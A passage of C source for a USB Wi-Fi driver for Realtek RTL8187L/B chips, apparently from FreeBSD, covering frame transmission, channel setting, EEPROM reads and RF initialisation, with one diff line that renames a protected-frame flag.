struct ifnet *ifp = ic->ic_ifp; struct urtw_data *bf; struct urtw_softc *sc = ifp->if_softc; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } URTW_LOCK(sc); bf = urtw_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); URTW_UNLOCK(sc); return (ENOBUFS); /* XXX */ } ifp->if_opackets++; if (urtw_tx_start(sc, ni, m, bf, URTW_PRIORITY_LOW) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); URTW_UNLOCK(sc); return (EIO); } URTW_UNLOCK(sc); sc->sc_txtimer = 5; return (0); } static void urtw_scan_start(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtw_scan_end(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtw_set_channel(struct ieee80211com *ic) { struct urtw_softc *sc = ic->ic_ifp->if_softc; struct ifnet *ifp = sc->sc_ifp; uint32_t data, orig; usb_error_t error; /* * if the user set a channel explicitly using ifconfig(8) this function * can be called earlier than we're expected that in some cases the * initialization would be failed if setting a channel is called before * the init have done. */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return; if (sc->sc_curchan != NULL && sc->sc_curchan == ic->ic_curchan) return; URTW_LOCK(sc); /* * during changing th channel we need to temporarily be disable * TX. */ urtw_read32_m(sc, URTW_TX_CONF, &orig); data = orig & ~URTW_TX_LOOPBACK_MASK; urtw_write32_m(sc, URTW_TX_CONF, data | URTW_TX_LOOPBACK_MAC); error = sc->sc_rf_set_chan(sc, ieee80211_chan2ieee(ic, ic->ic_curchan)); if (error != 0) goto fail; usb_pause_mtx(&sc->sc_mtx, 10); urtw_write32_m(sc, URTW_TX_CONF, orig); urtw_write16_m(sc, URTW_ATIM_WND, 2); urtw_write16_m(sc, URTW_ATIM_TR_ITV, 100); urtw_write16_m(sc, URTW_BEACON_INTERVAL, 100); urtw_write16_m(sc, URTW_BEACON_INTERVAL_TIME, 100); fail: URTW_UNLOCK(sc); sc->sc_curchan = ic->ic_curchan; if (error != 0) device_printf(sc->sc_dev, "could not change the channel\n"); } static void urtw_update_mcast(struct ifnet *ifp) { /* XXX do nothing? */ } static int urtw_tx_start(struct urtw_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, struct urtw_data *data, int prior) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211_frame *wh = mtod(m0, struct ieee80211_frame *); struct ieee80211_key *k; const struct ieee80211_txparam *tp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct usb_xfer *rtl8187b_pipes[URTW_8187B_TXPIPE_MAX] = { sc->sc_xfer[URTW_8187B_BULK_TX_BE], sc->sc_xfer[URTW_8187B_BULK_TX_BK], sc->sc_xfer[URTW_8187B_BULK_TX_VI], sc->sc_xfer[URTW_8187B_BULK_TX_VO] }; struct usb_xfer *xfer; int dur = 0, rtsdur = 0, rtsenable = 0, ctsenable = 0, rate, pkttime = 0, txdur = 0, isshort = 0, xferlen; uint16_t acktime, rtstime, ctstime; uint32_t flags; usb_error_t error; URTW_ASSERT_LOCKED(sc); /* * Software crypto. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); /* XXX we don't expect the fragmented frames */ m_freem(m0); return (ENOBUFS); } /* in case packet header moved, reset pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct urtw_tx_radiotap_header *tap = &sc->sc_txtap; /* XXX Are variables correct? */ tap->wt_flags = 0; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); ieee80211_radiotap_tx(vap, m0); } if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT || (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) { tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; rate = tp->mgmtrate; } else { tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; /* for data frames */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else rate = urtw_rtl2rate(sc->sc_currate); } sc->sc_stats.txrates[sc->sc_currate]++; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txdur = pkttime = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, 0); else { acktime = urtw_compute_txtime(14, 2,0, 0); if ((m0->m_pkthdr.len + 4) > vap->iv_rtsthreshold) { rtsenable = 1; ctsenable = 0; rtstime = urtw_compute_txtime(URTW_ACKCTS_LEN, 2, 0, 0); ctstime = urtw_compute_txtime(14, 2, 0, 0); pkttime = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, isshort); rtsdur = ctstime + pkttime + acktime + 3 * URTW_ASIFS_TIME; txdur = rtstime + rtsdur; } else { rtsenable = ctsenable = rtsdur = 0; pkttime = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, isshort); txdur = pkttime + URTW_ASIFS_TIME + acktime; } if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) dur = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, isshort) + 3 * URTW_ASIFS_TIME + 2 * acktime; else dur = URTW_ASIFS_TIME + acktime; } USETW(wh->i_dur, dur); xferlen = m0->m_pkthdr.len; xferlen += (sc->sc_flags & URTW_RTL8187B) ? (4 * 8) : (4 * 3); if ((0 == xferlen % 64) || (0 == xferlen % 512)) xferlen += 1; memset(data->buf, 0, URTW_TX_MAXSIZE); flags = m0->m_pkthdr.len & 0xfff; flags |= URTW_TX_FLAG_NO_ENC; if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE) && (sc->sc_preamble_mode == URTW_PREAMBLE_MODE_SHORT) && (sc->sc_currate != 0)) flags |= URTW_TX_FLAG_SPLCP; if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) flags |= URTW_TX_FLAG_MOREFRAG; flags |= (sc->sc_currate & 0xf) << URTW_TX_FLAG_TXRATE_SHIFT; if (sc->sc_flags & URTW_RTL8187B) { struct urtw_8187b_txhdr *tx; tx = (struct urtw_8187b_txhdr *)data->buf; if (ctsenable) flags |= URTW_TX_FLAG_CTS; if (rtsenable) { flags |= URTW_TX_FLAG_RTS; flags |= (urtw_rate2rtl(11) & 0xf) << URTW_TX_FLAG_RTSRATE_SHIFT; tx->rtsdur = rtsdur; } tx->flag = htole32(flags); tx->txdur = txdur; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT && (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) tx->retry = 1; else tx->retry = URTW_TX_MAXRETRY; m_copydata(m0, 0, m0->m_pkthdr.len, (uint8_t *)(tx + 1)); } else { struct urtw_8187l_txhdr *tx; tx = (struct urtw_8187l_txhdr *)data->buf; if (rtsenable) { flags |= URTW_TX_FLAG_RTS; tx->rtsdur = rtsdur; } flags |= (urtw_rate2rtl(11) & 0xf) << URTW_TX_FLAG_RTSRATE_SHIFT; tx->flag = htole32(flags); tx->retry = 3; /* CW minimum */ tx->retry = 7 << 4; /* CW maximum */ tx->retry = URTW_TX_MAXRETRY << 8; /* retry limitation */ m_copydata(m0, 0, m0->m_pkthdr.len, (uint8_t *)(tx + 1)); } data->buflen = xferlen; data->ni = ni; data->m = m0; if (sc->sc_flags & URTW_RTL8187B) { switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: xfer = sc->sc_xfer[URTW_8187B_BULK_TX_EP12]; break; default: KASSERT(M_WME_GETAC(m0) < URTW_8187B_TXPIPE_MAX, ("unsupported WME pipe %d", M_WME_GETAC(m0))); xfer = rtl8187b_pipes[M_WME_GETAC(m0)]; break; } } else xfer = (prior == URTW_PRIORITY_LOW) ? sc->sc_xfer[URTW_8187L_BULK_TX_LOW] : sc->sc_xfer[URTW_8187L_BULK_TX_NORMAL]; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(xfer); error = urtw_led_ctl(sc, URTW_LED_CTL_TX); if (error != 0) device_printf(sc->sc_dev, "could not control LED (%d)\n", error); return (0); } static int urtw_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct urtw_softc *sc = ic->ic_ifp->if_softc; struct urtw_vap *uvp = URTW_VAP(vap); struct ieee80211_node *ni; usb_error_t error = 0; DPRINTF(sc, URTW_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); sc->sc_state = nstate; IEEE80211_UNLOCK(ic); URTW_LOCK(sc); usb_callout_stop(&sc->sc_led_ch); callout_stop(&sc->sc_watchdog_ch); switch (nstate) { case IEEE80211_S_INIT: case IEEE80211_S_SCAN: case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); /* setting bssid. */ urtw_write32_m(sc, URTW_BSSID, ((uint32_t *)ni->ni_bssid)[0]); urtw_write16_m(sc, URTW_BSSID + 4, ((uint16_t *)ni->ni_bssid)[2]); urtw_update_msr(sc); /* XXX maybe the below would be incorrect. */ urtw_write16_m(sc, URTW_ATIM_WND, 2); urtw_write16_m(sc, URTW_ATIM_TR_ITV, 100); urtw_write16_m(sc, URTW_BEACON_INTERVAL, 0x64); urtw_write16_m(sc, URTW_BEACON_INTERVAL_TIME, 100); error = urtw_led_ctl(sc, URTW_LED_CTL_LINK); if (error != 0) device_printf(sc->sc_dev, "could not control LED (%d)\n", error); ieee80211_free_node(ni); break; default: break; } fail: URTW_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static void urtw_watchdog(void *arg) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_txtimer > 0) { if (--sc->sc_txtimer == 0) { device_printf(sc->sc_dev, "device timeout\n"); ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, urtw_watchdog, sc); } } static void urtw_set_multi(void *arg) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (!(ifp->if_flags & IFF_UP)) return; /* * XXX don't know how to set a device. Lack of docs. Just try to set * IFF_ALLMULTI flag here. */ ifp->if_flags |= IFF_ALLMULTI; } static usb_error_t urtw_set_rate(struct urtw_softc *sc) { int i, basic_rate, min_rr_rate, max_rr_rate; uint16_t data; usb_error_t error; basic_rate = urtw_rate2rtl(48); min_rr_rate = urtw_rate2rtl(12); max_rr_rate = urtw_rate2rtl(48); urtw_write8_m(sc, URTW_RESP_RATE, max_rr_rate << URTW_RESP_MAX_RATE_SHIFT | min_rr_rate << URTW_RESP_MIN_RATE_SHIFT); urtw_read16_m(sc, URTW_BRSR, &data); data &= ~URTW_BRSR_MBR_8185; for (i = 0; i <= basic_rate; i++) data |= (1 << i); urtw_write16_m(sc, URTW_BRSR, data); fail: return (error); } static uint16_t urtw_rate2rtl(uint32_t rate) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; for (i = 0; i < N(urtw_ratetable); i++) { if (rate == urtw_ratetable[i].reg) return urtw_ratetable[i].val; } return (3); #undef N } static uint16_t urtw_rtl2rate(uint32_t rate) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; for (i = 0; i < N(urtw_ratetable); i++) { if (rate == urtw_ratetable[i].val) return urtw_ratetable[i].reg; } return (0); #undef N } static usb_error_t urtw_update_msr(struct urtw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_MSR, &data); data &= ~URTW_MSR_LINK_MASK; if (sc->sc_state == IEEE80211_S_RUN) { switch (ic->ic_opmode) { case IEEE80211_M_STA: case IEEE80211_M_MONITOR: data |= URTW_MSR_LINK_STA; if (sc->sc_flags & URTW_RTL8187B) data |= URTW_MSR_LINK_ENEDCA; break; case IEEE80211_M_IBSS: data |= URTW_MSR_LINK_ADHOC; break; case IEEE80211_M_HOSTAP: data |= URTW_MSR_LINK_HOSTAP; break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported operation mode 0x%x\n", ic->ic_opmode); error = USB_ERR_INVAL; goto fail; } } else data |= URTW_MSR_LINK_NONE; urtw_write8_m(sc, URTW_MSR, data); fail: return (error); } static usb_error_t urtw_read8_c(struct urtw_softc *sc, int val, uint8_t *data) { struct usb_device_request req; usb_error_t error; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint8_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_read16_c(struct urtw_softc *sc, int val, uint16_t *data) { struct usb_device_request req; usb_error_t error; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint16_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_read32_c(struct urtw_softc *sc, int val, uint32_t *data) { struct usb_device_request req; usb_error_t error; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint32_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_write8_c(struct urtw_softc *sc, int val, uint8_t data) { struct usb_device_request req; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint8_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_write16_c(struct urtw_softc *sc, int val, uint16_t data) { struct usb_device_request req; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint16_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_write32_c(struct urtw_softc *sc, int val, uint32_t data) { struct usb_device_request req; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint32_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_get_macaddr(struct urtw_softc *sc) { uint32_t data; usb_error_t error; error = urtw_eprom_read32(sc, URTW_EPROM_MACADDR, &data); if (error != 0) goto fail; sc->sc_bssid[0] = data & 0xff; sc->sc_bssid[1] = (data & 0xff00) >> 8; error = urtw_eprom_read32(sc, URTW_EPROM_MACADDR + 1, &data); if (error != 0) goto fail; sc->sc_bssid[2] = data & 0xff; sc->sc_bssid[3] = (data & 0xff00) >> 8; error = urtw_eprom_read32(sc, URTW_EPROM_MACADDR + 2, &data); if (error != 0) goto fail; sc->sc_bssid[4] = data & 0xff; sc->sc_bssid[5] = (data & 0xff00) >> 8; fail: return (error); } static usb_error_t urtw_eprom_read32(struct urtw_softc *sc, uint32_t addr, uint32_t *data) { #define URTW_READCMD_LEN 3 int addrlen, i; int16_t addrstr[8], data16, readcmd[] = { 1, 1, 0 }; usb_error_t error; /* NB: make sure the buffer is initialized */ *data = 0; /* enable EPROM programming */ urtw_write8_m(sc, URTW_EPROM_CMD, URTW_EPROM_CMD_PROGRAM_MODE); DELAY(URTW_EPROM_DELAY); error = urtw_eprom_cs(sc, URTW_EPROM_ENABLE); if (error != 0) goto fail; error = urtw_eprom_ck(sc); if (error != 0) goto fail; error = urtw_eprom_sendbits(sc, readcmd, URTW_READCMD_LEN); if (error != 0) goto fail; if (sc->sc_epromtype == URTW_EEPROM_93C56) { addrlen = 8; addrstr[0] = addr & (1 << 7); addrstr[1] = addr & (1 << 6); addrstr[2] = addr & (1 << 5); addrstr[3] = addr & (1 << 4); addrstr[4] = addr & (1 << 3); addrstr[5] = addr & (1 << 2); addrstr[6] = addr & (1 << 1); addrstr[7] = addr & (1 << 0); } else { addrlen=6; addrstr[0] = addr & (1 << 5); addrstr[1] = addr & (1 << 4); addrstr[2] = addr & (1 << 3); addrstr[3] = addr & (1 << 2); addrstr[4] = addr & (1 << 1); addrstr[5] = addr & (1 << 0); } error = urtw_eprom_sendbits(sc, addrstr, addrlen); if (error != 0) goto fail; error = urtw_eprom_writebit(sc, 0); if (error != 0) goto fail; for (i = 0; i < 16; i++) { error = urtw_eprom_ck(sc); if (error != 0) goto fail; error = urtw_eprom_readbit(sc, &data16); if (error != 0) goto fail; (*data) |= (data16 << (15 - i)); } error = urtw_eprom_cs(sc, URTW_EPROM_DISABLE); if (error != 0) goto fail; error = urtw_eprom_ck(sc); if (error != 0) goto fail; /* now disable EPROM programming */ urtw_write8_m(sc, URTW_EPROM_CMD, URTW_EPROM_CMD_NORMAL_MODE); fail: return (error); #undef URTW_READCMD_LEN } static usb_error_t urtw_eprom_cs(struct urtw_softc *sc, int able) { uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data); if (able == URTW_EPROM_ENABLE) urtw_write8_m(sc, URTW_EPROM_CMD, data | URTW_EPROM_CS); else urtw_write8_m(sc, URTW_EPROM_CMD, data & ~URTW_EPROM_CS); DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_ck(struct urtw_softc *sc) { uint8_t data; usb_error_t error; /* masking */ urtw_read8_m(sc, URTW_EPROM_CMD, &data); urtw_write8_m(sc, URTW_EPROM_CMD, data | URTW_EPROM_CK); DELAY(URTW_EPROM_DELAY); /* unmasking */ urtw_read8_m(sc, URTW_EPROM_CMD, &data); urtw_write8_m(sc, URTW_EPROM_CMD, data & ~URTW_EPROM_CK); DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_readbit(struct urtw_softc *sc, int16_t *data) { uint8_t data8; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data8); *data = (data8 & URTW_EPROM_READBIT) ? 1 : 0; DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_writebit(struct urtw_softc *sc, int16_t bit) { uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data); if (bit != 0) urtw_write8_m(sc, URTW_EPROM_CMD, data | URTW_EPROM_WRITEBIT); else urtw_write8_m(sc, URTW_EPROM_CMD, data & ~URTW_EPROM_WRITEBIT); DELAY(URTW_EPROM_DELAY); fail: return (error); } static usb_error_t urtw_eprom_sendbits(struct urtw_softc *sc, int16_t *buf, int buflen) { int i = 0; usb_error_t error = 0; for (i = 0; i < buflen; i++) { error = urtw_eprom_writebit(sc, buf[i]); if (error != 0) goto fail; error = urtw_eprom_ck(sc); if (error != 0) goto fail; } fail: return (error); } static usb_error_t urtw_get_txpwr(struct urtw_softc *sc) { int i, j; uint32_t data; usb_error_t error; error = urtw_eprom_read32(sc, URTW_EPROM_TXPW_BASE, &data); if (error != 0) goto fail; sc->sc_txpwr_cck_base = data & 0xf; sc->sc_txpwr_ofdm_base = (data >> 4) & 0xf; for (i = 1, j = 0; i < 6; i += 2, j++) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW0 + j, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[i] = data & 0xf; sc->sc_txpwr_cck[i + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[i] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[i + 1] = (data & 0xf000) >> 12; } for (i = 1, j = 0; i < 4; i += 2, j++) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW1 + j, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[i + 6] = data & 0xf; sc->sc_txpwr_cck[i + 6 + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[i + 6] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[i + 6 + 1] = (data & 0xf000) >> 12; } if (sc->sc_flags & URTW_RTL8187B) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW2, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[1 + 6 + 4] = data & 0xf; sc->sc_txpwr_ofdm[1 + 6 + 4] = (data & 0xf0) >> 4; error = urtw_eprom_read32(sc, 0x0a, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[2 + 6 + 4] = data & 0xf; sc->sc_txpwr_ofdm[2 + 6 + 4] = (data & 0xf0) >> 4; error = urtw_eprom_read32(sc, 0x1c, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[3 + 6 + 4] = data & 0xf; sc->sc_txpwr_cck[3 + 6 + 4 + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[3 + 6 + 4] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[3 + 6 + 4 + 1] = (data & 0xf000) >> 12; } else { for (i = 1, j = 0; i < 4; i += 2, j++) { error = urtw_eprom_read32(sc, URTW_EPROM_TXPW2 + j, &data); if (error != 0) goto fail; sc->sc_txpwr_cck[i + 6 + 4] = data & 0xf; sc->sc_txpwr_cck[i + 6 + 4 + 1] = (data & 0xf00) >> 8; sc->sc_txpwr_ofdm[i + 6 + 4] = (data & 0xf0) >> 4; sc->sc_txpwr_ofdm[i + 6 + 4 + 1] = (data & 0xf000) >> 12; } } fail: return (error); } static usb_error_t urtw_get_rfchip(struct urtw_softc *sc) { int ret; uint8_t data8; uint32_t data; usb_error_t error; if (sc->sc_flags & URTW_RTL8187B) { urtw_read8_m(sc, 0xe1, &data8); switch (data8) { case 0: sc->sc_flags |= URTW_RTL8187B_REV_B; break; case 1: sc->sc_flags |= URTW_RTL8187B_REV_D; break; case 2: sc->sc_flags |= URTW_RTL8187B_REV_E; break; default: device_printf(sc->sc_dev, "unknown type: %#x\n", data8); sc->sc_flags |= URTW_RTL8187B_REV_B; break; } } else { urtw_read32_m(sc, URTW_TX_CONF, &data); switch (data & URTW_TX_HWMASK) { case URTW_TX_R8187vD_B: sc->sc_flags |= URTW_RTL8187B; break; case URTW_TX_R8187vD: break; default: device_printf(sc->sc_dev, "unknown RTL8187L type: %#x\n", data & URTW_TX_HWMASK); break; } } error = urtw_eprom_read32(sc, URTW_EPROM_RFCHIPID, &data); if (error != 0) goto fail; switch (data & 0xff) { case URTW_EPROM_RFCHIPID_RTL8225U: error = urtw_8225_isv2(sc, &ret); if (error != 0) goto fail; if (ret == 0) { sc->sc_rf_init = urtw_8225_rf_init; sc->sc_rf_set_sens = urtw_8225_rf_set_sens; sc->sc_rf_set_chan = urtw_8225_rf_set_chan; sc->sc_rf_stop = urtw_8225_rf_stop; } else { sc->sc_rf_init = urtw_8225v2_rf_init; sc->sc_rf_set_chan = urtw_8225v2_rf_set_chan; sc->sc_rf_stop = urtw_8225_rf_stop; } sc->sc_max_sens = URTW_8225_RF_MAX_SENS; sc->sc_sens = URTW_8225_RF_DEF_SENS; break; case URTW_EPROM_RFCHIPID_RTL8225Z2: sc->sc_rf_init = urtw_8225v2b_rf_init; sc->sc_rf_set_chan = urtw_8225v2b_rf_set_chan; sc->sc_max_sens = URTW_8225_RF_MAX_SENS; sc->sc_sens = URTW_8225_RF_DEF_SENS; sc->sc_rf_stop = urtw_8225_rf_stop; break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported RF chip %d\n", data & 0xff); error = USB_ERR_INVAL; goto fail; } device_printf(sc->sc_dev, "%s rf %s hwrev %s\n", (sc->sc_flags & URTW_RTL8187B) ? "rtl8187b" : "rtl8187l", ((data & 0xff) == URTW_EPROM_RFCHIPID_RTL8225U) ? "rtl8225u" : "rtl8225z2", (sc->sc_flags & URTW_RTL8187B) ? ((data8 == 0) ? "b" : (data8 == 1) ? "d" : "e") : "none"); fail: return (error); } static usb_error_t urtw_led_init(struct urtw_softc *sc) { uint32_t rev; usb_error_t error; urtw_read8_m(sc, URTW_PSR, &sc->sc_psr); error = urtw_eprom_read32(sc, URTW_EPROM_SWREV, &rev); if (error != 0) goto fail; switch (rev & URTW_EPROM_CID_MASK) { case URTW_EPROM_CID_ALPHA0: sc->sc_strategy = URTW_SW_LED_MODE1; break; case URTW_EPROM_CID_SERCOMM_PS: sc->sc_strategy = URTW_SW_LED_MODE3; break; case URTW_EPROM_CID_HW_LED: sc->sc_strategy = URTW_HW_LED; break; case URTW_EPROM_CID_RSVD0: case URTW_EPROM_CID_RSVD1: default: sc->sc_strategy = URTW_SW_LED_MODE0; break; } sc->sc_gpio_ledpin = URTW_LED_PIN_GPIO0; fail: return (error); } static usb_error_t urtw_8225_rf_init(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; uint16_t data; usb_error_t error; error = urtw_8180_set_anaparam(sc, URTW_8225_ANAPARAM_ON); if (error) goto fail; error = urtw_8225_usb_init(sc); if (error) goto fail; urtw_write32_m(sc, URTW_RF_TIMING, 0x000a8008); urtw_read16_m(sc, URTW_BRSR, &data); /* XXX ??? */ urtw_write16_m(sc, URTW_BRSR, 0xffff); urtw_write32_m(sc, URTW_RF_PARA, 0x100044); error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_write8_m(sc, URTW_CONFIG3, 0x44); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_8185_rf_pins_enable(sc); if (error) goto fail; usb_pause_mtx(&sc->sc_mtx, 1000); for (i = 0; i < N(urtw_8225_rf_part1); i++) { urtw_8225_write(sc, urtw_8225_rf_part1[i].reg, urtw_8225_rf_part1[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } usb_pause_mtx(&sc->sc_mtx, 100); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC1); usb_pause_mtx(&sc->sc_mtx, 200); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, URTW_8225_ADDR_2_DATA_MAGIC2); usb_pause_mtx(&sc->sc_mtx, 200); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC3); for (i = 0; i < 95; i++) { urtw_8225_write(sc, URTW_8225_ADDR_1_MAGIC, (uint8_t)(i + 1)); urtw_8225_write(sc, URTW_8225_ADDR_2_MAGIC, urtw_8225_rxgain[i]); } urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC4); urtw_8225_write(sc, URTW_8225_ADDR_0_MAGIC, URTW_8225_ADDR_0_DATA_MAGIC5); for (i = 0; i < 128; i++) { urtw_8187_write_phy_ofdm(sc, 0xb, urtw_8225_agc[i]); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0xa, (uint8_t)i + 0x80); usb_pause_mtx(&sc->sc_mtx, 1); } for (i = 0; i < N(urtw_8225_rf_part2); i++) { urtw_8187_write_phy_ofdm(sc, urtw_8225_rf_part2[i].reg, urtw_8225_rf_part2[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } error = urtw_8225_setgain(sc, 4); if (error) goto fail; for (i = 0; i < N(urtw_8225_rf_part3); i++) { urtw_8187_write_phy_cck(sc, urtw_8225_rf_part3[i].reg, urtw_8225_rf_part3[i].val); usb_pause_mtx(&sc->sc_mtx, 1); } urtw_write8_m(sc, URTW_TESTR, 0x0d); error = urtw_8225_set_txpwrlvl(sc, 1); if (error) goto fail; urtw_8187_write_phy_cck(sc, 0x10, 0x9b); usb_pause_mtx(&sc->sc_mtx, 1); urtw_8187_write_phy_ofdm(sc, 0x26, 0x90); usb_pause_mtx(&sc->sc_mtx, 1); /* TX ant A, 0x0 for B */ error = urtw_8185_tx_antenna(sc, 0x3); if (error) goto fail; urtw_write32_m(sc, URTW_HSSI_PARA, 0x3dc00002); error = urtw_8225_rf_set_chan(sc, 1); fail: return (error); #undef N } static usb_error_t urtw_8185_rf_pins_enable(struct urtw_softc *sc) { usb_error_t error = 0; urtw_write16_m(sc, URTW_RF_PINS_ENABLE, 0x1ff7); fail: return (error); } static usb_error_t urtw_8185_tx_antenna(struct urtw_softc *sc, uint8_t ant) { usb_error_t error; urtw_write8_m(sc, URTW_TX_ANTENNA, ant); usb_pause_mtx(&sc->sc_mtx, 1); fail: return (error); } static usb_error_t 